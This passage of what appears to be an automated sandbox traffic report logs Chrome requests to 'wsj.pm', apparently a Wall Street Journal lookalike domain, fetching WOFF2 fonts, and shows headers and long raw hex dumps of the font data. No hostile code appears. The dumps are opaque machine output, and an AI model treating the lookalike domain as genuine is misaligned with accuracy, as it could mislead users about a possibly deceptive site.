                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 65 4f 54 f5 f3 44 93 fc f8 c6 31 75 c6 67 2c d3 ca c0 d8 84 bc 67 cb 62 78 ac 41 cb 6b c5 19 2c 0b 6d a1 44 7b 73 a8 e9 99 a1 ec 86 67 13 4b 24 a8 d1 c2 98 e4 1f 4e 98 a4 1d 43 62 6a ed fe cb b7 f6 51 0a d3 73 19 35 c8 71 20 75 d3 79 15 a9 9d 04 ef f9 f5 d1 6d 4a 11 78 b3 02 61 e6 07 db 54 2f a3 f6 5f d6 c6 24 c0 5a 23 93 aa 38 35 94 ca 8d c5 c5 ee f0 3b c9 b9 71 ba f5 9d 72 39 d8 28 f6 dd eb af 83 f1 24 99 b8 b9 46 92 6a 16 5d 8a 43 1e 09 e8 ae 98 7a 5a 9a 2f f4 d9 31 06 e3 12 a9 55 f4 ac ff 41 3e 8f 4a dc 89 d6 cb c9 06 98 bd f7 9a b5 6a 22 2a 35 3d 7f 29 fc 68 7a 44 a9 1b 43 ed 25 a6 bf bb 9a b3 57 29 1a c5 f2 d0 e7 aa a1 18 18 7f 6f 27 c6 17 29 46 f3 24 a4 61 d5 cd 48 b8 e7 18 79 22 eb 9d 47 94 0b 69 95 4d 5f 03 e2 93 ed 23 37 bc ec 6e 0a 52 f3 49 24
                                                                                                                Data Ascii: eOTD1ug,gbxAk,mD{sgK$NCbjQs5q uymJxaT/_$Z#85;qr9($Fj]CzZ/1UA>Jj"*5=)hzDC%W)o')F$aHy"GiM_#7nRI$
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 7a 88 e9 1c 59 2a 8d de c4 4f 06 72 30 9d 32 95 d0 4b 9f c3 32 27 65 c7 a9 21 ff a3 ed db d7 9d fb f7 8f 0a 3f 0f a0 6e 02 32 75 8a 18 1e c8 f8 91 1c c2 cc c4 e8 92 dc c5 df 6f a1 2d 66 27 01 b1 31 8b be b9 84 90 6c 19 04 99 35 92 f7 bd 15 30 16 f2 66 c9 88 4b 5c ba 37 88 91 f7 d3 2a 5e 11 41 0f 96 39 bc f8 0c 6c d5 a9 9d b0 25 fc d4 28 48 75 8e 34 c5 e7 d5 33 61 4d b0 dd 4f 56 c3 a6 71 03 51 e0 6a 05 f4 d8 cf d8 1b 79 04 3a 76 ad aa 79 36 15 56 f5 b0 6f 3c 81 8e 81 15 8a 13 86 0d 36 58 40 80 5d 3b 8f a9 78 7f d8 32 35 0a 8c 2e cd cf 8d 09 e6 97 38 82 86 09 44 a6 ff 46 f1 75 7e 85 99 3d 4d 1e 29 25 ef c6 84 91 c9 63 93 1a 69 c2 22 e7 57 21 e0 22 ae ed e7 e7 ec ea 34 b3 ca 96 b2 fb 8e 7b ee 93 da c8 df f1 80 ab 43 f8 99 61 9d 61 52 7e 89 5e 77 ab 61 ce 7c
                                                                                                                Data Ascii: zY*Or02K2'e!?n2uo-f'1l50fK\7*^A9l%(Hu43aMOVqQjy:vy6Vo<6X@];x25.8DFu~=M)%ci"W!"4{CaaR~^wa|
                                                                                                                2024-04-25 14:58:19 UTC1884INData Raw: 7e 06 6f 4f 29 53 28 1d 03 c6 ee a6 74 aa e9 18 a0 e5 d7 a2 f3 fb bb 38 66 42 6f c4 e8 fd 9d 30 2b 97 0d 03 92 f4 1a 2c e2 fe 04 c2 0f 96 64 25 3e d4 ee a2 aa c4 24 de 91 6e da 1f 34 88 49 f0 4a f4 ed 04 8f 92 ac 12 e5 38 c1 68 2b 2a 8f 12 55 84 51 8c 4a b1 f6 34 ec 0e e8 70 94 19 c9 97 cf 64 7a a2 81 b0 0e 34 64 98 e3 cc 0a e8 30 2f 83 1a a3 c2 e9 df 0f d2 1f ee ad 22 0c 68 1f b1 89 49 74 a2 10 99 1c b2 f0 a1 5d 1b d6 4c 99 d4 a3 4b 9b 56 2d 9a 34 aa 57 0e af 0c 4e a1 7c 79 72 a4 4b 93 22 89 97 0e 35 aa 94 28 96 2b 47 50 ba 00 3f 1f 0f b7 64 0e 89 12 c4 89 66 a5 a2 20 25 41 05 20 72 39 2c 02 03 5c 05 b9 8a 10 b4 c4 f9 ce 59 68 84 e1 4a 41 63 0a 5c 11 c2 6b a6 8c 6b e2 c1 29 96 09 46 1c d3 cf 90 08 a8 45 18 57 64 10 e2 88 f9 6c b3 0a 39 b2 f9 61 43 cb c0
                                                                                                                Data Ascii: ~oO)S(t8fBo0+,d%>$n4IJ8h+*UQJ4pdz4d0/"hIt]LKV-4WN|yrK"5(+GP?df %A r9,\YhJAc\kk)FEWdl9aC


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.1749732103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC562OUTGET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC253INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:41:23 GMT
                                                                                                                ETag: "1054d-60eae37c4b2c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 66893
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:19 UTC7939INData Raw: 77 4f 46 32 00 01 00 00 00 01 05 4d 00 12 00 00 00 03 b9 f0 00 01 04 21 00 01 00 00 00 01 04 88 00 00 00 c5 00 00 01 eb 00 00 00 00 00 00 00 00 19 3a 1a 82 1e 1b 82 8b 40 1c d3 4c 06 60 00 92 46 08 81 4c 09 9a 16 11 08 0a 8a cd 58 89 fa 29 01 36 02 24 03 9d 3e 0b 9e 3c 00 04 20 05 8e 71 07 c5 46 0c 81 3c 5b c7 7f 93 6d 39 ee ee fa 7a a9 da 42 66 40 e7 10 93 6c 38 28 e8 0b e2 e5 76 25 9a 63 07 c9 67 cd b2 6b 78 e5 49 c5 66 18 e3 86 b8 ed 33 c1 20 73 db 00 a8 96 67 31 7b 25 d9 ff ff ff ff ff ff ff 2f 5e 26 61 5b 49 b6 75 92 66 b7 0b a5 ad 08 c8 2b df f1 a8 a7 9e ff 11 24 55 65 06 56 b9 92 21 56 54 a5 aa ce 83 61 4a b1 6e d2 28 36 a9 a5 51 ee 22 53 6b 72 ef 2a e6 ba 47 77 cb c7 77 e6 4d 9a d0 34 05 f7 10 5b 2b cc 23 75 5c 09 99 00 d8 84 cd 78 56 6a a4 5e 49
                                                                                                                Data Ascii: wOF2M!:@L`FLX)6$>< qF<[m9zBf@l8(v%cgkxIf3 sg1{%/^&a[Iuf+$UeV!VTaJn(6Q"Skr*GwwM4[+#u\xVj^I
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 09 b1 58 58 8c 0e 32 a8 b9 74 c3 e5 9a 07 2e f0 7a c5 31 b4 b6 ba d4 64 95 0e fc 62 6b 4d 4c 8c d6 8f d5 30 aa d4 9a 63 9b 17 d0 9a 6a 35 04 11 da c4 7e 0a b9 02 a1 de 08 90 a4 ec ec 1d 1a d1 fc 40 6d 16 55 58 1e 44 8f 4f 6a cb a5 4e 6a af 6f a3 cb 66 25 7e 8e 24 22 dd 02 d9 9a 1a e4 51 53 d4 0d 6a 11 8f 89 8e db 86 0d ac b1 69 44 a0 a3 67 d7 63 9d 48 0d 21 fe c5 50 5b f3 80 2c f9 e7 8a 8e 8a 30 42 c5 42 57 03 90 fa 52 17 02 55 b2 22 28 63 49 c7 45 17 d1 4c 6a e4 dc d7 55 a3 8c 84 f4 b5 29 25 e2 87 46 df 18 59 19 80 ca 57 41 71 24 b5 42 71 97 c2 77 74 96 bf 6b f3 ea 9a 2e 73 ee 5e 61 24 5d ae bd c2 04 9e 03 02 df 2a a5 16 8a 74 73 c1 2c 6b 85 a6 eb ce f7 0e 91 70 cd 90 9c e5 fb 08 b5 35 64 fc a5 c4 b2 03 36 e6 69 2d e6 0c 60 46 62 04 30 70 8d 38 b2 6c be
                                                                                                                Data Ascii: XX2t.z1dbkML0cj5~@mUXDOjNjof%~$"QSjiDgcH!P[,0BBWRU"(cIELjU)%FYWAq$Bqwtk.s^a$]*ts,kp5d6i-`Fb0p8l
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 41 f0 2b a2 df c4 fa 1d ce 03 a2 05 01 06 0b 06 02 c7 56 b1 64 be c5 2b 18 55 e1 68 8a 96 20 7f 14 75 e3 ab 9f 40 e3 52 35 4c a8 69 69 86 e7 6a e9 5c 2c 9b 87 b1 79 5a 31 6f cb e7 65 e5 7c 6c 58 88 ed 8b b6 6d 51 36 2d ec 36 5f d7 85 5d ed d5 5f c3 35 5e f3 cd 6c 51 62 49 15 2b 91 61 de c3 70 9e c2 18 3e 3f df 09 5f 44 db d4 ba d1 75 3e 48 dd bf a4 20 61 e2 a9 0e ca 83 7f 4a c6 87 fb 5c e9 3f 2e 94 39 21 74 08 45 c7 06 52 8d b9 03 81 f2 4b 5f 03 d5 d3 29 67 c4 9f 1f 23 ca b5 7e 72 a2 89 01 06 e7 75 bf 1b fe dc 25 35 cb 19 1c 9d 45 87 83 77 d0 b3 a9 11 43 10 df 7c af c0 ee 3f 98 1f 77 a9 5e 3f 79 ce 6e d9 7a 0b 0b a4 af 9e cc e2 7f 37 0c 50 4d 65 62 ac 25 5e 89 95 74 03 7a 60 70 15 09 8c f2 45 45 06 cc c0 df 04 8a f4 69 68 c5 21 fb 69 4f 95 79 4b 6e 7a f2
                                                                                                                Data Ascii: A+Vd+Uh u@R5Liij\,yZ1oe|lXmQ6-6_]_5^lQbI+ap>?_Du>H aJ\?.9!tERK_)g#~ru%5EwC|?w^?ynz7PMeb%^tz`pEEih!iOyKnz
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 6d 56 34 b9 a2 e9 37 08 d1 2d 03 e4 9e 05 92 b7 f7 26 97 1d 86 10 62 5a da f8 dd 7d f9 40 0a 6f ee dc 8b 14 e7 1d 70 f2 e6 f4 09 42 fc 0f e8 f3 0b d5 6d 34 33 d8 e6 54 8d cd f4 45 3d 63 e3 74 bd bb ac d9 df bb e9 6c dd 2d 5a e7 5f 1a be 96 a7 6d 38 50 a7 ed ea e7 6b 1a 0e 66 6d dc 7f 0e dd bd 93 15 dc 3e 8d ac 55 8f 76 da 34 ce 02 05 23 55 9c 67 1b 64 71 d5 f5 47 2a 50 39 85 aa 70 ef 21 5d f3 a1 e6 01 96 a8 62 4d 1c fa ea b6 32 6f 52 6f f3 b9 fd ff 41 6f 86 f7 51 17 53 6a 6d 1a 6f 85 29 99 2f b6 c9 15 c9 d3 37 9c 27 0e 96 c4 2d 7c 4f fb 53 5d 51 87 2c dc 49 67 46 e3 d1 8f 7f f9 9e be 36 61 31 ff 47 0c d7 95 11 ba 8d 50 e5 db 7d 3d f5 ba 06 77 5e 5c 95 2d 33 df 61 a1 a1 bf a2 85 e8 5c f1 a3 92 99 fa 90 58 75 52 2c 53 5a e3 74 6a 6b 25 6c f4 15 04 6c 6f 83
                                                                                                                Data Ascii: mV47-&bZ}@opBm43TE=ctl-Z_m8Pkfm>Uv4#UgdqG*P9p!]bM2oRoAoQSjmo)/7'-|OS]Q,IgF6a1GP}=w^\-3a\XuR,SZtjk%llo
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 38 de b2 e4 5d 57 4f 28 bf 5f 5b c5 b9 36 4a 2a 99 0f 48 b3 1b 37 84 53 26 57 c8 cb a1 22 69 89 be e2 9b 4d 67 03 fb 04 59 72 40 5c d1 46 36 91 92 b3 35 74 32 f2 29 06 10 5c 1e 2c 6b e2 82 84 16 13 4c 39 1e 47 f4 37 6c 78 56 5b 78 35 3c ba d0 59 ba 18 5b c5 2e f7 2e d2 15 b3 5b fb 25 a0 26 d1 1a 7e 13 7b 8d b0 ca ae 07 d1 d8 7a 29 4d d9 37 36 12 97 78 e7 b3 8d 21 f0 76 c2 9e 4d 99 a5 48 35 42 3f 7d 5d b0 bb 01 d6 38 6f 0a 33 88 6f d0 7f 0b 27 62 e3 e8 a0 eb 35 9a f2 5b fc 64 b0 11 e9 54 c8 82 a2 f2 94 8d a8 b6 fa ec b5 08 90 35 2c ed a6 a5 52 86 12 86 61 1e d3 4c af 0b 74 37 04 85 f6 32 d6 c9 69 88 f7 95 80 84 5b 86 ef 9f 60 67 bd 73 94 9d 8d 71 ed 8a 0d 49 40 e7 96 dc 02 26 7b 73 9d f0 7b c5 0e b9 73 6f fa 61 7d f2 d9 8e f7 7c 0e 7d 31 7c 7a 53 b0 a7 01
                                                                                                                Data Ascii: 8]WO(_[6J*H7S&W"iMgYr@\F65t2)\,kL9G7lxV[x5<Y[..[%&~{z)M76x!vMH5B?}]8o3o'b5[dT5,RaLt72i[`gsqI@&{s{soa}|}1|zS
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 92 30 d3 56 31 8c 01 dc c3 a3 12 71 10 a3 1f 6f bc a6 76 c5 60 1c a9 61 a7 72 3f d9 66 c9 e5 39 07 67 cb 8e 21 b6 43 82 86 63 b2 6f 95 0b 1a af cf fb 7b a3 ae 2e 08 d8 99 c6 45 8a b6 0c 19 a5 32 f1 13 b8 85 b1 fb 89 04 28 56 f8 01 01 93 76 3c 5f c2 49 0a cb 02 61 9d 6b 70 d2 e3 07 8e e7 e8 c2 d8 4f 71 7e b5 d0 dc cc 57 fe b0 8a 84 c5 61 c9 5d 53 8a db 28 3c 1a 97 80 3f f1 a2 d4 92 c0 09 2d 04 b6 87 6e f5 64 da 17 b4 f6 bb ba 4c a7 d9 b4 2a ec fb 17 48 2f 99 6c 72 2b 14 b5 51 21 83 7a 74 41 72 e8 18 c0 96 71 56 38 1a c9 9d c9 c5 04 56 6c 6d 55 83 a9 46 12 b9 9a b2 aa 48 95 d2 f7 e4 7e 95 af f8 8a ba 20 f0 72 f4 fa 28 9b af cc 44 78 bf 92 39 dd b8 9c e2 94 82 3b ab 6e 1c 0f cc 9a 08 dd 0e c9 e2 bf 45 28 d6 b4 8b 28 ec 05 52 4f 73 8e d8 81 a0 60 9b ca d2 82
                                                                                                                Data Ascii: 0V1qov`ar?f9g!Cco{.E2(Vv<_IakpOq~Wa]S(<?-ndL*H/lr+Q!ztArqV8VlmUFH~ r(Dx9;nE((ROs`
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 9e ec 3c b8 d0 71 0f 47 63 33 b1 12 fe eb 2c b7 22 93 39 71 90 64 57 5b 31 1e 75 95 8d d6 da 7e ec 4d 7e 91 d8 6c e1 57 9c 62 02 ee 2e 49 3d a4 48 29 71 50 cd b5 4b 9b 26 c7 76 ee d9 e5 79 87 90 11 03 f5 48 61 c2 5f f4 12 a9 74 ed 64 0f 98 04 5c 20 92 01 96 42 e5 c0 17 47 47 e9 4a 9c 6b cd e1 72 66 2d 89 77 d7 9b 3a 99 1d 88 ab d6 dc d6 59 88 3a d8 87 67 5b de ad 4f 8d 4b b2 76 01 e9 ef 20 ba 05 0c 3b cb 02 f2 1a b3 0f 42 8a 51 bf 99 27 88 88 dd b5 97 0a 52 d4 2b 73 19 d5 f6 c4 0d 89 83 c3 fd 7f 14 b0 28 1a 7c 16 15 98 91 28 9d 6d e6 ed 25 3b 74 5b 6f a6 0c 99 bb 9a 7b 03 1e 39 05 89 0a f5 85 b1 5a 0a d2 bb 51 08 dc 56 44 d9 5d c1 91 a4 cd 06 e5 0d f5 02 2d a4 93 72 a1 24 05 b5 31 4d e3 65 48 ab 08 21 b6 0d 72 98 ff 89 ad 6d dc e0 29 e9 c6 89 cd 5f bc 74
                                                                                                                Data Ascii: <qGc3,"9qdW[1u~M~lWb.I=H)qPK&vyHa_td\ BGGJkrf-w:Y:g[OKv ;BQ'R+s(|(m%;t[o{9ZQVD]-r$1MeH!rm)_t
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 53 e4 10 4f 9d 4c af 88 a7 bf 28 25 22 40 11 7a 08 41 77 f6 0c 9a 3b 44 a0 ba 35 ca 6d a0 f6 ad 1c 55 6a b6 49 a3 a5 77 59 e7 c3 75 94 cc 31 5f 45 72 7b 62 c5 20 45 80 91 1e 81 3a 59 50 f8 4a 05 c2 0a 54 a0 c0 b8 4d 81 da 40 9d 9a 52 f0 5d 08 64 7c be 5f 0a e6 c9 5b 9d e3 af 5a d6 64 76 05 77 f1 e2 54 4b 5e e0 2d 9c 59 9d 70 19 31 52 a4 11 b7 78 de bd 09 f8 ba a2 fa 95 d5 13 5a 3d 39 36 5f e3 b9 c9 6b 07 9e a1 b9 6f ea 35 b0 ad 6b 0f 70 ee 22 35 31 5f 96 40 ec 99 35 6a c7 6d ea 2d eb 22 44 03 a1 cb 57 86 71 37 62 b8 05 ce 24 d5 e4 e8 a4 1b a7 b8 95 84 8e cf cc c0 8a 5f db 5b e3 61 73 f5 9d 63 6c 0f b8 39 4b 91 62 49 09 2d 3c 33 ee 16 38 b9 90 4a 7b 5b 7b 71 82 03 ca 0e e1 97 63 d1 37 67 47 2e f0 56 83 da 21 52 2f 0f 86 ed e8 db 9c 6c f2 22 dc ea 6d ba 6f
                                                                                                                Data Ascii: SOL(%"@zAw;D5mUjIwYu1_Er{b E:YPJTM@R]d|_[ZdvwTK^-Yp1RxZ=96_ko5kp"51_@5jm-"DWq7b$_[ascl9KbI-<38J{[{qc7gG.V!R/l"mo
                                                                                                                2024-04-25 14:58:19 UTC2954INData Raw: bd 50 86 4d 43 c3 98 d2 ad 27 7c 08 7d 63 2c 02 62 e3 61 42 48 5c 49 a5 20 a3 34 29 0f f1 a8 49 9a 9c 21 9a 04 f4 44 1d 31 14 69 49 18 fd 18 66 8d 6e 45 17 f2 19 5a 16 85 96 46 b1 66 60 35 26 e4 29 d0 37 fd 3f c9 aa d4 38 09 3c f6 33 2c a1 56 ea e4 d9 23 82 e9 72 e0 46 a1 6d d6 8c 1a 57 2d 1a 75 72 41 a3 82 87 4f 40 28 55 9a 74 19 32 65 11 11 cb 26 21 25 23 a7 a0 a4 a2 a6 a1 a5 a3 67 60 64 62 66 61 ed 2f 7b f6 fe f5 df 3d 4e 2e 6e 1e 39 72 79 e5 c9 e7 53 a0 50 91 62 7e 25 4a 95 29 57 a1 52 95 6a 35 6a d5 a9 d7 a0 b1 79 7d 66 d3 a4 59 8b 56 01 6d da 75 e8 d4 a5 5b 4f fd 49 cb 4b 6f de fa 64 ca aa 22 d9 5d ca 89 ac 3e 1f 33 e4 2b 50 a8 28 df 16 cd 65 96 12 a5 ca 94 ab 50 a9 ca a3 16 b2 58 0d a8 c7 6a d5 75 a2 5e 83 46 4d 9a b5 80 81 b7 64 d5 72 d6 68 83 d0
                                                                                                                Data Ascii: PMC'|}c,baBH\I 4)I!D1iIfnEZFf`5&)7?8<3,V#rFmW-urAO@(Ut2e&!%#g`dbfa/{=N.n9rySPb~%J)WRj5jy}fYVmu[OIKod"]>3+P(ePXju^FMdrh


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.1749733103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:19 UTC556OUTGET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:41:21 GMT
                                                                                                                ETag: "f9d5-60eae37a62e40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 63957
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:19 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 f9 d5 00 12 00 00 00 03 aa f4 00 00 f8 a9 00 01 00 00 00 00 f9 10 00 00 00 c5 00 00 01 eb 00 00 00 00 00 00 00 00 19 3a 1a 82 1e 1b 81 fe 32 1c d3 4c 06 60 00 92 46 08 81 4c 09 9a 16 11 08 0a 8a bc 74 89 ed 76 01 36 02 24 03 9d 3e 0b 9e 3c 00 04 20 05 8e 65 07 c5 46 0c 81 3c 5b fa 72 b3 05 8a 8d e1 9f d6 67 55 09 65 19 c1 70 63 8c d9 29 52 92 ad 5e 0f a0 ba 7c a8 0b a2 c8 a5 35 37 e8 1c 9b e3 5c 54 5d 0f ac c3 ae a0 db be 83 da 0b cc 6d 83 82 e8 97 b7 92 79 65 ff ff ff ff ff ff ff ff ff df 46 f2 43 6a f3 67 5e c2 4b 32 d9 c3 65 11 17 11 c4 15 8f 8a da 52 2b d5 96 42 af ff ad 2a 54 21 4a b2 5c 50 4a 15 2b 21 aa 11 e5 00 b2 71 1e b6 d8 ca 11 0f 47 a3 d1 58 1f 75 12 27 90 84 a4 33 89 5b 7c ac a2 8e f5 14 74 72 e2 3e f3 46 a7 7a
                                                                                                                Data Ascii: wOF2:2L`FLtv6$>< eF<[rgUepc)R^|57\T]myeFCjg^K2eR+B*T!J\PJ+!qGXu'3[|tr>Fz
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 09 45 c4 02 69 5a b7 b1 7a 94 0c 1b 30 fa a1 9e 39 fe 7d c1 2e 63 21 f5 72 2b 3b 6c 9d cd 90 7c 7e 35 51 bc 52 26 87 0a d3 24 b9 3a a4 9a 1a b3 f0 26 d6 45 d7 f5 a9 b3 43 3e c9 ae 0e ea 41 57 90 f4 d6 bc a3 27 1c c9 ef 61 1f fc 43 29 fa 29 76 a4 ad 75 eb 31 e5 c6 f0 35 80 7f 9f c4 fb 96 2f 7d 35 6a a0 60 2f b0 b0 16 f6 c1 12 98 7d e1 02 37 cb ca c1 35 88 ad bb e2 ae dd 2f ae dd 1c 2c a7 79 ae 6f e1 71 53 27 b3 d5 47 e3 f4 29 a4 ac ad 03 87 61 34 db 5b 85 2c 3c 2e 19 8b 22 6e c9 1b 12 02 3e 25 0e 8e 39 2b 2e 84 9c 75 65 8b b3 78 ac 24 fa 5c b4 d4 b8 78 1a ef e0 ab 3b 09 8e 44 e1 c6 ad 52 a1 14 8f a2 f5 ba 55 ac 24 01 aa 85 6d 85 75 73 01 66 7c b8 ea 8d 12 79 c8 c8 57 55 cb 8a 99 82 cd c9 90 53 aa a5 66 78 a9 fc 70 8a c2 3f 02 04 14 05 fd 5f d1 e2 df 7d dd
                                                                                                                Data Ascii: EiZz09}.c!r+;l|~5QR&$:&EC>AW'aC))vu15/}5j`/}75/,yoqS'G)a4[,<."n>%9+.uex$\x;DRU$musf|yWUSfxp?_}
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 90 aa 06 d3 50 95 50 86 d3 7a 5f 7e c1 3a 40 96 6c 72 89 1d ff 28 be eb 30 47 27 28 94 db 24 62 d6 3c 78 ef 57 e3 ca 5b 23 56 9f 58 73 b5 18 99 8d 2a fe 9a 70 45 c5 04 45 16 a8 44 dc ed 9a 79 58 b1 15 65 bc 41 3f d0 d8 6a a6 53 80 99 3f ae 86 7f 22 75 a9 6a ce f4 32 20 fd c8 26 5e 22 0f 96 61 ef dc 67 d1 77 7a 2f be 7b 90 eb 6c be d9 74 e2 f7 ce 0e 86 8d 2d 62 ad 65 0b 64 a4 d7 17 f3 a5 3b 24 35 8e 69 a8 35 53 cc 5d 8e ae 69 7c 35 d2 b1 80 dc 6b 37 7b 6e 36 85 bb f4 0c 99 e3 c5 ca 11 a7 ca 1b 1c 61 99 09 8e b7 57 46 1c 31 46 c6 e1 d3 4f 3a bd f7 b8 19 68 49 47 22 71 de 93 c8 d1 9f 02 2d 2c 64 b0 db 73 cf d4 1c 06 f4 e6 e8 8c b2 76 08 a4 e6 77 be b7 08 b6 71 ef d2 8f 5c cc 62 fe 5e 5c dc d5 8a 6d 64 b4 8a 8a 1d 64 ba 23 5d 83 91 9e c1 49 df 10 64 60 48 32
                                                                                                                Data Ascii: PPz_~:@lr(0G'($b<xW[#VXs*pEEDyXeA?jS?"uj2 &^"agwz/{lt-bed;$5i5S]i|5k7{n6aWF1FO:hIG"q-,dsvwq\b^\mdd#]Id`H2
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 92 61 13 61 4d 92 1f ef 60 94 e6 74 16 55 90 20 b4 43 79 05 d1 32 45 aa b8 c2 64 c0 f0 41 75 df c3 8f 26 20 cb 1f ed 46 32 e7 88 b3 16 aa c2 73 a2 c4 32 36 bf 34 5b 8e 3a 71 6d 1b 62 57 42 44 a1 f3 5b 18 65 0d 36 36 75 6e f9 a5 f3 70 5c 1f f6 9a e2 0a 7f 1b 65 ff 6f fb 29 01 b6 bc e2 35 6c ae 4f 13 39 b0 a0 ac 20 17 cd 1e c4 bd c4 0e 86 10 53 79 9c b4 f4 69 5f 8d f3 1c c4 de c4 0d b2 51 79 76 9b 5a eb 65 da f3 7f 15 ee 1e 36 ee 85 9d 19 6a 00 c2 b2 1d cc 67 08 ec 59 9c 95 1f e7 65 58 b0 0f b3 c7 4b 59 2c d0 0c 0c b5 38 ab 54 85 d5 10 33 10 62 96 61 9e 7d 8b 3d 86 b3 2e f8 df 98 9f 0b b2 82 a0 56 e3 9d 0b b8 85 db ee 6f 78 a0 c0 dd c4 6e 59 c0 cb 0d 06 05 f3 8d ad cd d8 a3 38 f2 d4 f5 5d 7f a7 e1 7e c6 1e 6e 95 97 86 01 31 92 62 c7 f6 f2 e5 06 87 46 b7 07
                                                                                                                Data Ascii: aaM`tU Cy2EdAu& F2s264[:qmbWBD[e66unp\eo)5lO9 Syi_QyvZe6jgYeXKY,8T3ba}=.VoxnY8]~n1bF
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 0e 81 87 43 c2 e1 90 f0 70 34 ac a5 03 7e eb ab bf b1 95 ae 4b 1d 9a d1 81 c1 5b c1 01 97 40 a0 dd e6 b2 f1 94 fe a3 25 20 b0 1e 14 f0 6c 04 5c 0f 86 10 0d eb 52 e7 9c 77 29 00 bc 75 17 e8 66 80 92 7d c4 8e 9f d6 44 99 a1 21 82 10 80 10 ea b6 d5 91 df 57 bd 0e 9f 97 ef 83 f4 bf ec 73 e6 17 fb 18 44 93 24 d5 03 c4 1f 04 01 18 cc 67 01 c0 37 53 66 c0 0a 97 02 17 9d 4f 09 16 5f 46 07 92 c3 d6 97 fb 02 bb ff 20 9a 5e 57 6e d1 b4 c5 a5 58 16 16 d6 52 fa 8e f5 2e 7e e9 48 f8 df 50 d8 df e1 e1 8f 60 b0 1f 8e c3 b6 47 45 b0 97 c3 e7 49 81 1b fc a6 fa 3c 58 ed 09 0a 8f 43 a5 4a 1e 0a 99 cf 4d 48 48 71 24 1e 65 8f 8a b2 a3 50 65 38 1a ca d0 29 eb 23 a0 70 f8 db 48 22 57 dd f2 e2 9b d1 52 d7 3c 0f b8 5b a1 47 8a 80 10 8b 33 d0 e4 3e 18 ef 70 08 88 13 03 8a a5 f5 ea
                                                                                                                Data Ascii: Cp4~K[@% l\Rw)uf}D!WsD$g7SfO_F ^WnXR.~HP`GEI<XCJMHHq$ePe8)#pH"WR<[G3>p
